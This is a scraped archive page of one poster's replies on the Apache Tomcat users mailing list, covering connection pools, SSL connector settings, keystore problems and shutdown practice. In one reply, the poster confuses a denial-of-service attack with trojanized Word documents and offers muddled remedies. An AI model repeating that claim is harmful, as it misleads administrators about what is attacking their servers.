this.doInclude(uri, request, response); } else { super.doForward(uri, request, response); } MGDO NOT COMMIT THE RESPONSE HERE IN THIS SERVLET MGALLOW URL YOU
RE: understanding jdbc pool
From: neven.cvetko...@gmail.com Date: Wed, 5 Mar 2014 20:25:36 -0500 Subject: Re: understanding jdbc pool To: users@tomcat.apache.org On Wed, Mar 5, 2014 at 3:15 PM, S Ahmed sahmed1...@gmail.com wrote: Hi, With jdbc pool, is each socket connection in the pool handled by a separate thread? Ahmed, thanks for asking this question - it is sometimes very confusing with all different kind of pools: connection pools, threadpools, etc... Chris pointed out already - the connection pool does not have any threads... It is not a process that runs in the background, these are just connection objects that are sitting in memory. Threads are created by the Tomcat container (executor) once the connection is received by the Connector. The created thread is then going to be handled by the container and it will go through the stack call, through Valves, Filters, Servlets, your middleware layer, DAOs, JDBC/JPA calls and then finally through your datasource object, connection, PreparedStatement, ResultSet, etc... and back all the way to the socket that browser initiated, returning the thread to the threadpool (e.g. http-bio-8080). Now, I am not sure about the connection pool implementation details, how connection pool keeps connections open, if there are any background threads that are handling connection management (closing abandoned connections, opening new connections as the demand rises, etc...) Maybe someone can comment on that. MGNot from 1.4 commons-dbcp..here is a typical reference to Thread in source MGThread.currentThread(). MG(Although I have seen multiple thread calls in attached testcases) I have not seen Separate Thread in main body MGI am sure someone here would put a feature request in to support Thread-Aware Connections MGIf you put the feature request in I will second the request (and make sure ThreadAware gets implemented) MGThen again Im sure there are other libraries that will handle Thread aware database connection pools MGwould anyone know the names of those libraries? MGBTW Mr Schultz is right Say you have 20 connections set to be open at minimum, does that mean there will be 20 threads? If not, then there is a degree of serialization then right? Well, there will be no serialization, but rather synchronization as there are at most available connections, if the connection pool (datasource) reaches maximum allowed connections, depending on the implementation - it would be a blocking call, until the pool has available connection to provide... Look at the documentation for Tomcat default connection pool implementation: https://tomcat.apache.org/tomcat-7.0-doc/jdbc-pool.html Hopefully that clears some of the confusion. Cheers! Neven
RE: java: src/network.c:441: Java_org_apache_tomcat_jni_Socket_send: Assertion failed
FYI If you are using NIO Connector you will want to supply these NIO Connector attributes https://tomcat.apache.org/tomcat-7.0-doc/config/http.html#Standard_Implementation If you are using SSL on NIO read SSL on NIO for that capability APR Native SSL would use these parameters Attribute Description SSLCACertificateFile See the mod_ssl documentation. SSLCACertificatePath See the mod_ssl documentation. SSLCARevocationFile See the mod_ssl documentation. SSLCARevocationPath See the mod_ssl documentation. SSLCertificateChainFile See the mod_ssl documentation. SSLCACertificateFile Name of the file that contains the concatenated certificates for the trusted certificate authorities. The format is PEM-encoded. SSLCACertificatePath Name of the directory that contains the certificates for the trusted certificate authorities. The format is PEM-encoded. SSLCARevocationFile Name of the file that contains the concatenated certificate revocation lists for the certificate authorities. The format is PEM-encoded. SSLCARevocationPath Name of the directory that contains the certificate revocation lists for the certificate authorities. The format is PEM-encoded. SSLCertificateChainFile Name of the file that contains concatenated certifcates for the certificate authorities which form the certifcate chain for the server certificate. The format is PEM-encoded. SSLCertificateFile Name of the file that contains the server certificate. The format is PEM-encoded. SSLCertificateKeyFile Name of the file that contains the server private key. The format is PEM-encoded. The default value is the value of SSLCertificateFile and in this case both certificate and private key have to be in this file (NOT RECOMMENDED). SSLCipherSuite Ciphers which may be used for communicating with clients. The default is ALL, with other acceptable values being a list of ciphers, with : used as the delimiter (see OpenSSL documentation for the list of ciphers supported). SSLDisableCompression Disables compression if set to true and OpenSSL supports disabling compression. Default is false which inherits the default compression setting in OpenSSL. SSLHonorCipherOrder Set to true to enforce the server's cipher order (from the SSLCipherSuite setting) instead of allowing the client to choose the cipher (which is the default). SSLPassword Pass phrase for the encrypted private key. If SSLPassword is not provided, the callback function should prompt for the pass phrase. SSLProtocol Protocol which may be used for communicating with clients. The default value is all, which is equivalent to SSLv3+TLSv1 with other acceptable values being SSLv2, SSLv3, TLSv1 and any combination of the three protocols concatenated with a plus sign. Note that the protocol SSLv2 is inherently unsafe. SSLVerifyClient Ask client for certificate. The default is none, meaning the client will not have the opportunity to submit a certificate. Other acceptable values include optional, require and optionalNoCA. SSLVerifyDepth Maximum verification depth for client certificates. The default is 10. Tweak these Connector timeout parameters to acomodate your requirement asyncTimeout connectionTimeout connectionUploadTimeout disableUploadTimeout executorTerminationTimeoutMillis keepAliveTimeout socket.soTimeout socket.unlockTimeout selectorTimeout sessionTimeout (yes..Mr Schultz is correct on the last statement) Martin- Date: Wed, 5 Mar 2014 15:12:02 +0200 Subject: Re: java: src/network.c:441: Java_org_apache_tomcat_jni_Socket_send: Assertion failed From: dmitry.batiyevs...@ardas.dp.ua To: users@tomcat.apache.org Atmosphere upgrade didn't help Regards, Dmitry Batiyevskiy Ardas Group Inc. www.ardas.dp.ua 2014-03-05 9:39 GMT+02:00 Dmitry Batiyevskiy dmitry.batiyevs...@ardas.dp.ua : We are ok with tomcat 7.0.42 and old tcnative now, and may be next tcnative update will work appropriately We will try updating atmosphere before trying NIO anyway Regards, Dmitry Batiyevskiy Ardas Group Inc. www.ardas.dp.ua 2014-03-04 23:18 GMT+02:00 Christopher Schultz ch...@christopherschultz.net: -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Dmitry, On 3/4/14, 2:48 AM, Dmitry Batiyevskiy wrote: Howard, My connector config is the following (i've already posted that): Connector port=8443 maxHttpHeaderSize=8192 maxThreads=15000 enableLookups=false disableUploadTimeout=true acceptCount=100 scheme=https secure=true SSLEnabled=true compression=off SSLCertificateFile=/opt/tomcat/mycompany.com.crt SSLCertificateKeyFile=/opt/tomcat/mycompany.com.key / Also -Dhttps.protocols=TLSv1 option is passed to java machine The reason for me to use apr connector is https performance, isn't NIO much slower in that? I don't have any recent performance data, but using OpenSSL is apparently measurably faster than using
RE: Difference between process kill and shutdown
Date: Sat, 1 Mar 2014 04:11:57 -0800 Subject: Difference between process kill and shutdown From: akash.delh...@gmail.com To: users@tomcat.apache.org On our linux boxes, we have multiple users who run tomcat. Currently we are using process kill commands to kill the respective user's tomcat , instead of using shutdown.sh MGBad Practice Are there any downsides of using this approach ? MGThere are horrible downsides MGA Kill will take the running process out of the execution environment..no matter what the side effect is MGHooks to any of the configured Server Listeners CATALINA has started can be ignored and usually are MGThe result of a kill on parent process is MG you will still have one or more Listeners running as child daemons since they were never shutdown properly MGWhoever told you to use the kill command instead of shutdown should be court-martialed! Thanks, Akash
RE: Tomcat/Java Spring MVC 2.0/c3p0 - Consultant needed
I assume based on all the wonderful experiences the states have experienced in last dozen years that Canada has wised up and stopped Americans from sneaking across the border without a passport? better pack you snowshoes..they have about 6 feet of snow (last time i checked) Keep me apprised, M- Date: Tue, 25 Feb 2014 11:50:30 -0400 Subject: Re: Tomcat/Java Spring MVC 2.0/c3p0 - Consultant needed From: charle...@thelearningbar.com To: users@tomcat.apache.org On Tue, Feb 25, 2014 at 11:37 AM, Daniel Mikusa dmik...@gopivotal.comwrote: On Feb 25, 2014, at 10:14 AM, Charles Richard charle...@thelearningbar.com wrote: Hi, On Tue, Feb 25, 2014 at 1:26 AM, Christopher Schultz ch...@christopherschultz.net wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Charles, On 2/24/14, 10:15 AM, Charles Richard wrote: Sorry if this is not the right forum for this kind of inquiry. I figure the best candidates would be in this forum from personal experience. Our company is having production issues which I believe are either due to application inefficiencies or a bug somewhere in our software stack. We are having production issues with our Tomcat connection pool using c3p0 and while my knowledge in this area has improved, I lack the Java developer background that might help in this area and we are at a point where we need this solved quickly. I've never gotten the sense that c3p0 was production-ready. What made you deploy with c2p0 instead of either of the two connection pools that ship with Tomcat? (Note that c3p0 has nothing to do with Tomcat, other than that Tomcat can be configured to use c3p0 as its connection-pool). That is good to know that c3p0 might not be commonly used in production by companies using tomcats. I was under the impression it was the most commonly used. The problems could be related to leaked connections which I'm quite sure we have. I have turned on c3p0 debugging and identified this in the past and the ideal consultant could identify in our code where those are happening and fix them. Both pools Tomcat provides can help you track-down so-called abandoned connections by providing stack traces that point to the line of code that obtained the connection (or even Statement or ResultSet). C3P0 also allows you to track down abandoned connections and my gut feeling tells me how problem is not tied down exclusively to this as our Tomcat connection pools go from 1 used connection to 150 in a minute and I know we are not losing that many leaked connections in a minute. Regardless, I will check with the manager here to see if this has been tried in the past before I started this job and potentially try this as unfortunately, the problem is not happening in our staging environment. When you are experiencing the problem next, take some thread dumps. Try to get two or three, with 10 to 15 seconds between each one. You can then look at the thread dumps to see what's going on here. https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F It's not easy to get good thread dumps as one minute things are fine and the next minute, the site is going downhill. I have bash scripts that monitor c3p0 connections and take an automatic thread dump as soon as the number exceeds what's normal. There is information about interpreting them here or if you need help with it, you could post it to the list. https://wiki.apache.org/tomcat/HowTo#How_do_I_read_a_Java_thread_dump_.3F I have tried to analyze the thread dumps I have gotten so far without much luck but this could just be that I don't understand enough what I'm looking for. I will look at the link provided. Thanks for taking the time to write this! Dan Cheers, Charles I would highly recommend that you read this blog post I wrote several years ago that can help you look for obvious errors by providing examples for what JDBC code should look like -- if you are managing your own JDBC calls of course: http://blog.christopherschultz.net/index.php/2009/03/16/properly-handling-pooled-jdbc-connections/ We are looking to hire a consultant that would come to Fredericton, NB, Canada to work with us on this problem. Serious inquiries only. I will be looking for proof that you have extensive experience with Tomcat, Java Spring and c3p0. If you are interested, send me your resume (through your company or individually) and send me as much proof as possible of your experience with the specific technologies mentioned. While there is certainly no prohibition against doing so, this isn't really a help wanted message board. We are happy to help you -- for free! -- via email to solve your own problems. If you find this free forum helpful, please
RE: Status of the current IIS ISAPI Redirector for Tomcat
This is a TC Users list so I will redirect the conversation to how do we use SPD in a Tomcat implementation TO Wit: what you're asking is there support for SPDY Protocol in any version of TOMCAT? Since SPDY requires the use of SSL/TLS (with TLS extension NPN) Which version TC Container supports TLS/NPM? *gruss* Martin __ From: kpreis...@apache.org To: users@tomcat.apache.org Subject: RE: Status of the current IIS ISAPI Redirector for Tomcat Date: Sat, 15 Feb 2014 15:00:44 +0100 Hi Angel and Bilal, thank you for your replies. -Original Message- From: Angel Java Lopez [mailto:ajlopez2...@gmail.com] Sent: Saturday, February 15, 2014 11:59 AM To: Tomcat Users List Subject: Re: Status of the current IIS ISAPI Redirector for Tomcat Very interesting! Yes, managed code is the path to follow. First idea non-blocking IO (from C# client side): use the new async/await for the communication. But force to use the new .NET framework and Visual Studio. And await is a wait on the current threads: http://msdn.microsoft.com/en-us/library/hh750082.aspx Maybe, a node.js approach, with a callback: http://stackoverflow.com/questions/16894907/creating-asynchronous- methods-with-task-factory-and-callback and only .NET 4.0: http://msdn.microsoft.com/en-us/library/dd537612(v=vs.100).aspx I don't still see the value of await: it blocked the current thread. I guess it is better to use a callback A await on a Task in C# should internally return the current thread back to a threadpool, and use a callback on another thread to continue execution of the method when the Task is finished, so that threads are not blocked when waiting e.g. for an I/O operation to complete. For a full utilization of asynchronous I/O, one would not only have to use async read/write operations when forwarding the request to Tomcat, but also async flush the response body at IIS to the client (and async read the request body). Although the .Net HttpResponse also seem to have BeginFlush() and EndFlush() methods that apply the old-style async programming pattern, in the SPDY Redirector (see below) I'm using Task.Factory.FromAsync(...) to convert these Begin/End-Methods into one that returns a Task, so that it can be integrated into the existing Task-based async code. For async flush and read operations at IIS to work, one will need to create an async module (IHttpModule, but use context.AddOnBeginRequestAsync() methods to add event handlers) or an async handler (derived from HttpTaskAsyncHandler). This is the approach that I use on a draft of an SPDY redirector that can already be tested with Jetty (but not yet with Tomcat), see [1]. After switching from blocking I/O to async methods, the number of threads of the IIS apppool (w3wp.exe) was greatly reduced when having a slow output producer (servlet) on the Jetty side, and a fast client connecting to IIS (but should also work for the more likely scenario: A fast output producer (Jetty) and a slow client); as with blocking I/O, the IIS threads would spend most of their time with doing nothing, whereas with the async approach, they can do other things meanwhile. This approach suits the idea of a multiplexing SPDY as you can send multiple requests on a single SPDY connection, so it doesn't block resources like sockets or threads for the duration of an request. With SPDY, it should also be possible to forward Websocket connections which is AFAIK not possible with AJP. Angel Java Lopez @ajlopez On Fri, Feb 14, 2014 at 9:26 PM, Bilal S bilal.so...@gmail.com wrote: Konstantin, snip == You raise good points. I have run into similar issues and thus created my own project outside the Apache foundation three years ago (BonCode). It is a C# based AJP connector. It can currently be used with Tomcat, JBOSS, Jetty. From support requests I am surmising that is currently bundled with software from a few manufacturers including: EMC, CSC, Siemens and others instead of ISAPI redirector. Thus, I do encourage the update of the current IIS connection mechanism to a more up-to-date method. Using a managed code mechanism is the way to go in my opinion. In the long run SPDY may also be of interest for the same purpose. The more choices the better. The following are differences already in existence with BonCode and in response to your extensive writing, only read on if you are curious:: Thank you for you detailed response, this is very helpful. snip 6. As far as I can see, the ISAPI redirector uses blocking I/O when forwarding requests to Tomcat. This means when a slow client sends a request to IIS which gets forwarded to Tomcat, and Tomcat starts to send the response, in the IIS worker process at least
RE: Unable to shutdown Tomcat
MGton of log information is missing..you must have disabled the logs somehow Date: Fri, 14 Feb 2014 21:51:55 -0500 From: ch...@christopherschultz.net To: users@tomcat.apache.org Subject: Re: Unable to shutdown Tomcat -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Pooja, On 2/14/14, 5:49 PM, Pooja Swamy wrote: Okay. Here you go - myMac:runtime test$ bin/catalina.sh run Using CATALINA_BASE: /Users/test/software/runtime Using CATALINA_HOME: /Users/test/software/runtime Using CATALINA_TMPDIR: /Users/test/software/runtime/temp Using JRE_HOME: /System/Library/Java/JavaVirtualMachines/1.6.0.jdk/Contents/Home Using CLASSPATH: /Users/test/software/runtime/bin/bootstrap.jar:/Users/test/software/runtime/bin/tomcat-juli.jar Feb 14, 2014 2:47:46 PM org.apache.catalina.core.AprLifecycleListener init INFO: The APR based Apache Tomcat Native library which allows optimal performance in production environments was not found on the java.library.path: .:/Library/Java/Extensions:/System/Library/Java/Extensions:/usr/lib/java There must be more. Is there nothing else printed after that? You go back to a command prompt? MGconfirm these entries in $CATALINA_HOME/conf/catalina.policy grant codeBase file:${catalina.home}/bin/tomcat-juli.jar { permission java.io.FilePermission ${java.home}${file.separator}lib${file.separator}logging.properties, read; permission java.io.FilePermission ${catalina.base}${file.separator}conf${file.separator}logging.properties, read; permission java.io.FilePermission ${catalina.base}${file.separator}logs, read, write; permission java.io.FilePermission ${catalina.base}${file.separator}logs${file.separator}*, read, write; MGalso if you do have a custom logging.properties you will need to define LOGGING_CONFIG MGduring catalina.bat start e.g MGrem LOGGING_CONFIG (Optional) Override Tomcat's logging config file rem Example (all one line) rem set LOGGING_CONFIG=-Djava.util.logging.config.file=%CATALINA_BASE%\conf\logging.properties MG - -chris MG- -martin -BEGIN PGP SIGNATURE- Version: GnuPG v1 Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCAAGBQJS/tZIAAoJEBzwKT+lPKRYmZsP/2pvFj76I0UQZ8P64SehuxJG qs0Jj/PIX0DC4jdhqn3Hs3TkzVplvhmTxWpQdDkq8/0X56aztLtpODn634MapqT5 NSxkMFS2xxHQ4GWeZ9iNCmOd+0HNv+bfFtB/ZVGqoU8jWSUAsyA5OXHJlDy909y7 Y17pnLccP1wyQ0v/oTxsvhFPn0tJ1bJiXedQEHA6vQLLVaagmOdFg0M5KUi20qQs qkbQUjMwnwNMj2aIxGOyvntxoMgGwoA8ZJauf2tM2SFPJBEwj5lcw6gxlWgOFWFY l83jl0kdaK6El3S4D0J9+rPUPGsNPXtkLHieWU54U7ZBjgoX2/nCPTFPmdc4+aVO H/hCTXbBst5LUpO8QCBNRTg0MJHE8eLDrjtjWnaxn9rToBOC5wwHgQnCZqDTS7zG T1nJNU3/hqu3Im5R+f+VVOX4HKdQj+tuPEBBjkci0e7sDg0HDEUUuUQ1AThLzVtw 6t5E/jyeRr3iga0rn96n+9r8Gv99+E8DI+GbgNQHzWpYyM7lGXW/itm3gu2jiT/a MQdXRkXLl7+VW0BWe78C1qgrNWkJE9420hTBvv+zHV0CGz6HZ+ui9GEqaOTO0iWm itBhv2XDOKcQ4DeLjKlXvZDghcP1HoZkTxszjpqUSXpGTKtFYXRqjl/zD4QG/Plo pkMmpzvjlsICb/YqoODD =14QC -END PGP SIGNATURE- - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: Eclipse: Server Tomcat v7.0 Server at localhost failed to start.
Date: Fri, 14 Feb 2014 14:19:04 -0800 Subject: Re: Eclipse: Server Tomcat v7.0 Server at localhost failed to start. From: davek1...@gmail.com To: users@tomcat.apache.org OK I added servlet-api.jar and jsp-api.jar to the Launch Configuration | Classpath | Bootstrap Entries and get the following error report: HTTP Status 500 - java.lang.NoClassDefFoundError: javax/el/ELResolver HTTP Status 500 - java.lang.NoClassDefFoundError: javax/el/ELResolver MGDave MGcan you confirm el-api.jar is located in lib folder of $CATALINA_HOME ? MG$CATALINA_HOME/lib/el-api.jar MGMartin- -- *note* *The full stack trace of the root cause is available in the Apache Tomcat/7.0.50 logs.* -- Apache Tomcat/7.0.50
RE: sudden increase in tomcat sessions..?
DOS (Denial of Service) Attack one type is endless ping if someone is running a endless loop of ping attacks on your TC server you can disable ICMP on TC server https://www.serverintellect.com/support/windowsserversecurity/disable-icmp-requests/ DOC attack usually results in TROJ_MDROPPER.* on system NAV and McAfee can detect these malware attachments on Word Docs http://blog.trendmicro.com/trendlabs-security-intelligence/trojanized-doc-files-in-targeted-attack/ HTH Martin Date: Sat, 8 Feb 2014 19:54:32 -0500 Subject: Re: sudden increase in tomcat sessions..? From: kumarkm...@gmail.com To: users@tomcat.apache.org Hi David, Thanks for your reply. How can I verify that it is a DOC attack? which log i should refer.please guide me. Thanks, Kumar. On Sat, Feb 8, 2014 at 7:42 PM, David Kerber dcker...@verizon.net wrote: On 2/8/2014 7:08 PM, Kumar Muthuramalingam wrote: Hi, I 'm using tomcat version 6 and 7. One day there was a sudden increase in number of sessions in both tomcats. And all the sessions had no username, same lastaccessed time, same created time and the inactive time was 00:00:00. It is not happening always but it happens some times on some day. Can't predict. And We have set the idle timeout as -1 because we have to. When I try to dig the log. It showed that the load balancer IP was sending many ping requests to our application. Can anybody tell why this is happening and how can I find the cause? DOS attack? Thanks, Kumar. - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: Menu is not working for since Tomcat 7.0.42
Date: Thu, 9 Jan 2014 15:41:21 +0530 Subject: Menu is not working for since Tomcat 7.0.42 From: cch...@gmail.com To: users@tomcat.apache.org Hello, We have a web application which has menus and sub menus which are basically divs. On clicking on menu we are showing the sub menus. This happens through AJAX request. The application was working fine till Tomcat 7.0.41. But since 7.0.42 it stopped working. We are using jdk 7. We did not change anything between 7.0.41 and 7.0.42 in our side. Could anyone give me pointer regarding the issue? MGImpossible... until you show us the code you are running MGZip up (server.xml and web.xml) jsps, java code,templates..the works..put on dropbox and send the link Thanks in advance. Chinmoy
RE: detailed APR/SSL logging
Date: Tue, 7 Jan 2014 14:51:21 +0500 Subject: detailed APR/SSL logging From: sanaulla...@gmail.com To: users@tomcat.apache.org Hi, Anyone knows, how do i can get the detailed APR/SSL debug logs. i need to know where my SSL session is getting broken? there is nothing in the catalina.out log. usage: java org.apache.catalina.startup.Catalina [ -config {pathname} ] [ -nonaming ] { -help | start | stop } Jan 07, 2014 1:43:12 AM org.apache.catalina.core.AprLifecycleListener init INFO: Loaded APR based Apache Tomcat Native library 1.1.29 using APR version 1.5.1. Jan 07, 2014 1:43:12 AM org.apache.catalina.core.AprLifecycleListener init INFO: APR capabilities: IPv6 [true], sendfile [true], accept filters [false], random [true]. Jan 07, 2014 1:43:12 AM org.apache.catalina.core.AprLifecycleListener initializeSSL INFO: OpenSSL successfully initialized (OpenSSL 1.0.1e 11 Feb 2013) Jan 07, 2014 1:43:12 AM org.apache.coyote.AbstractProtocol init INFO: Initializing ProtocolHandler [http-apr-8080] Jan 07, 2014 1:43:12 AM org.apache.coyote.AbstractProtocol init INFO: Initializing ProtocolHandler [http-apr-0.0.0.0-8443] Jan 07, 2014 1:43:12 AM org.apache.catalina.startup.Catalina load INFO: Initialization processed in 696 ms Jan 07, 2014 1:43:12 AM org.apache.catalina.core.StandardService startInternal INFO: Starting service Catalina Jan 07, 2014 1:43:12 AM org.apache.catalina.core.StandardEngine startInternal INFO: Starting Servlet Engine: Apache Tomcat/7.0.47 Jan 07, 2014 1:43:12 AM org.apache.catalina.startup.HostConfig deployDirectory INFO: Deploying web application directory /opt/tomcat/apache-tomcat-7.0.47-src/output/build/webapps/docs Jan 07, 2014 1:43:13 AM org.apache.catalina.startup.HostConfig deployDirectory INFO: Deploying web application directory /opt/tomcat/apache-tomcat-7.0.47-src/output/build/webapps/manager Jan 07, 2014 1:43:13 AM org.apache.catalina.startup.HostConfig deployDirectory INFO: Deploying web application directory /opt/tomcat/apache-tomcat-7.0.47-src/output/build/webapps/ROOT Jan 07, 2014 1:43:13 AM org.apache.catalina.startup.HostConfig deployDirectory INFO: Deploying web application directory /opt/tomcat/apache-tomcat-7.0.47-src/output/build/webapps/host-manager Jan 07, 2014 1:43:13 AM org.apache.catalina.startup.HostConfig deployDirectory INFO: Deploying web application directory /opt/tomcat/apache-tomcat-7.0.47-src/output/build/webapps/examples Jan 07, 2014 1:43:13 AM org.apache.coyote.AbstractProtocol start INFO: Starting ProtocolHandler [http-apr-8080] Jan 07, 2014 1:43:13 AM org.apache.coyote.AbstractProtocol start INFO: Starting ProtocolHandler [http-apr-0.0.0.0-8443] Jan 07, 2014 1:43:13 AM org.apache.catalina.startup.Catalina start INFO: Server startup in 935 ms -- Server looks up properly with openssl and certs but when i try to connect it with openssl s_client its getting error -- root@ubuntu:/home/san/certs/pay-test# openssl s_client -connect 127.0.0.1:8443 -tls1_2 -debug CONNECTED(0003) write to 0x8a03258 [0x8a0cfe3] (319 bytes = 319 (0x13F)) - 16 03 01 01 3a 01 00 01-36 03 03 52 cb cd f1 45 :...6..R...E 0010 - e9 1b fc 26 6f d9 b3 c7-90 58 88 80 92 eb 3f 57 ...oX?W 0020 - ab 9f be 49 2d 52 b4 1f-f1 c1 d6 00 00 9e c0 30 ...I-R.0 0030 - c0 2c c0 28 c0 24 c0 14-c0 0a c0 22 c0 21 00 a3 .,.(.$..!.. 0040 - 00 9f 00 6b 00 6a 00 39-00 38 00 88 00 87 c0 32 ...k.j.9.8.2 0050 - c0 2e c0 2a c0 26 c0 0f-c0 05 00 9d 00 3d 00 35 ...*=.5 0060 - 00 84 c0 12 c0 08 c0 1c-c0 1b 00 16 00 13 c0 0d 0070 - c0 03 00 0a c0 2f c0 2b-c0 27 c0 23 c0 13 c0 09 ./.+.'.# 0080 - c0 1f c0 1e 00 a2 00 9e-00 67 00 40 00 33 00 32 .g.@.3.2 0090 - 00 9a 00 99 00 45 00 44-c0 31 c0 2d c0 29 c0 25 .E.D.1.-.).% 00a0 - c0 0e c0 04 00 9c 00 3c-00 2f 00 96 00 41 c0 11 /...A.. 00b0 - c0 07 c0 0c c0 02 00 05-00 04 00 15 00 12 00 09 00c0 - 00 14 00 11 00 08 00 06-00 03 00 ff 01 00 00 6f ...o 00d0 - 00 0b 00 04 03 00 01 02-00 0a 00 34 00 32 00 0e ...4.2.. 00e0 - 00 0d 00 19 00 0b 00 0c-00 18 00 09 00 0a 00 16 00f0 - 00 17 00 08 00 06 00 07-00 14 00 15 00 04 00 05 0100 - 00 12 00 13 00 01 00 02-00 03 00 0f 00 10 00 11 0110 - 00 23 00 00 00 0d 00 22-00 20 06 01 06 02 06 03 .#.. .. 0120 - 05 01 05 02 05 03 04 01-04 02 04 03 03 01 03 02 0130 - 03 03 02 01 02 02 02 03-01 01 00 0f 00 01 01 ... read from 0x8a03258 [0x8a08a93] (5 bytes = 5 (0x5)) - 15 03 03 00 02 . read from 0x8a03258 [0x8a08a98] (2 bytes = 2 (0x2)) - 02 28 .( 3074095420:error:14094410:SSL
RE: Problem configuring SSL
Date: Tue, 7 Jan 2014 14:41:15 -0500 Subject: Re: Problem configuring SSL From: a-ko...@northwestern.edu To: users@tomcat.apache.org Gentlemen, thanks a lot for your help. I figured out what the problem was. It was not related to tomcat configuration, but to my keystore. The reason is that once you import a client certificate under the same alias as the private pair, they both get merged under the same alias inside keystore. Using keytool -delete command, meant to remove the certificate only, deletes the private pair as well. I noticed that once I dumped keystore content for my keystore and a keystore on one of my other servers. Luckily, I had a backup of the keystore I made right after it was created. Importing the certificates into that keystore resolved the issue. MGI *hope* you enabled at least ONE cipher for SSL Connector MGUsually the big players (Versign/Thawte) will provide valid CA cert/valid key in the supplied pfx MGglad to hear that worked for you On Sun, Jan 5, 2014 at 3:59 PM, Christopher Schultz ch...@christopherschultz.net wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Alex, On 1/5/14, 12:30 PM, Alex Kogan wrote: I have a strange problem configuring SSL to work with Tomcat. Environment: Tomcat 7.0.42 CentOS 5.10 Java 1.7.0_45 It's a new Tomcat installation. All keystore operations were done with keytool. I imported CA root/intermediate certificate and client certificate, configured SSL connector in server.xml. I have this same setup on another server that works fine. Connecting to this server via http works. 1. If I try to connect this address via https in Chrome I get: This Webpage is not available. In Firefox: Error code: ssl_error_no_cypher_overlap Sounds familiar. Please post your Connector configuration(s) from your server.xml file. Remember to remove any sensitive information from the configuration. Also please post all of the startup messages from Tomcat's logs/catalina.out file: we need to see the versions of various things and what components (if any) suffer problems starting up. 3. Here's a list of enabled ciphers using SSLInfo: #java -showversion SSLInfo Nice to see someone is getting some use out of that. ;) - -chris -BEGIN PGP SIGNATURE- Version: GnuPG v1 Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCAAGBQJSycfKAAoJEBzwKT+lPKRYBz0P/jDoaW+t7Zi1dCRp3zz/o1PS JXx0Pa61SkXQN4TgQFSyZ6seO1+IJjh1X1txiS81GOL3HZQCwZ9qbDfjOOKitynZ +d9Ky5R0UGUmG3/479ZFAIGfy8RXwtMJvoCpFo5dRA+ihevOzgzngGNzMdDm2KgC f8ZWIAue+9Hq9o0CBrjDxdYheyOgFbICzvC4YR/s5poxz3BhpGXNQVWyViyJzIo6 bn7uLzSqaGeCtemMJeXgPJ27lNh5SnXRjUfUr9dvGF/QNrXTSYmoDlfgHSuzWCl8 m18VrWdC8a76aQ0YW+0cIlX5TLDuQhBqsuVxNja+0GY2IP5+RBaF5LAsJ9sdTnBE /enlA8vvzYD8jZBGMvCkPAi7ZvG/amI6xw+QlaYeYTDqDfPUrM1ERZItg7l1fjaD SBVKaPCvtHN/IXVTDqDPfPS4v34yR+/MVwOFdiuagh3cRd/wt/WxbFC8jTFsktKB Yc87eh4Bwc24P6Kc74/l2+8LDFzwLGwSEGGm2c2h9fDu6OKbtF23B887ZsveWjyu RTlKcgsv8LzQi7SmnRH4S7A8KdfEv3Fh1rqLDbwzjaidoaHlDa/Rqo6zfBovCkiH 4z/QmVpI6sOh6IoULBxhOeqaubTvAvnErRTPeTSx5XPvJB9FwNHwGRwG6F+F3mV+ VCpWYwQ3I2qGEm5RBvbh =9FS1 -END PGP SIGNATURE- - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org -- Software Engineer Department of Psychiatry and Behavioral Sciences Northwestern University a-ko...@northwestern.edu
RE: expired crl file
Date: Sat, 4 Jan 2014 09:18:22 +0100 Subject: expired crl file From: jjaku...@gmail.com To: users@tomcat.apache.org When I place expired crl file tomcat starts without any visible stack trace in logs, but I cannot login with valid certificates. MG $CATALINA_HOME/conf/setevnv.sh # Uncomment the next line to print SSL debug trace in catalina.out #CATALINA_OPTS=$CATALINA_OPTS -Djavax.net.debug=ssl MG Is there any solution for this feature? BTW, how can I check validity/expiration date of crl file ? Regards Jakub MGHodne zdaru MGMartin-
RE: Symantec SSL cert in tomcat 6
MGOngnjen Gene, On 3.1.2014 14:55, Gene Matthews wrote: Thie symantec instructions say to ensure the alias for the ssl cert has an Entry Type of PrivateKeyEntry. Mine DOES NOT. Instructions say if it does not, to please import the certificate in the “Private Key” alias. With JKS keystore you must keep private key and certificates in the same keystore. MGSince A pfx that Verisign provides contains key and cert MGWindows servers use .pfx files to contain the public key files (your SSL Certificate files, provided by DigiCert) and MGthe associated private key file (generated by your server as part of the CSR). MGperhaps you are referring to the key/certificate combination in pfx? Therefore, you shouldn't import server certificate and inter. certificates into brand new keystore, but into the old keystore -- the one you used to create key pair, and to generate CSR. MGCSR is the request to CA Authority (verisign ) to sign (digitally identify) this certificate MG certificate signing request (also CSR or certification request) is a message sent from an applicant to a MGcertificate authority in order to apply for a digital identity certificate. The most common format for CSRs is the MGPKCS#10 specification MG I find it strange that Symantec/Verisign didn't mention that explicitly in their documentation. MGagreed It also says to ensure the Certificate chain length is 4. Once you import certificates into the right keystore, check that again. PS: How does one search the archives of this list? When I browse the archive site I don’t see a search field anywhere. So I’ve been googling without coming up with a solution. it is probably out there but I don’t know enough to recognize it :-( http://tomcat.apache.org/lists.html Search for Archives. -Ognjen - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: Java to JavaScript RMI framework available.
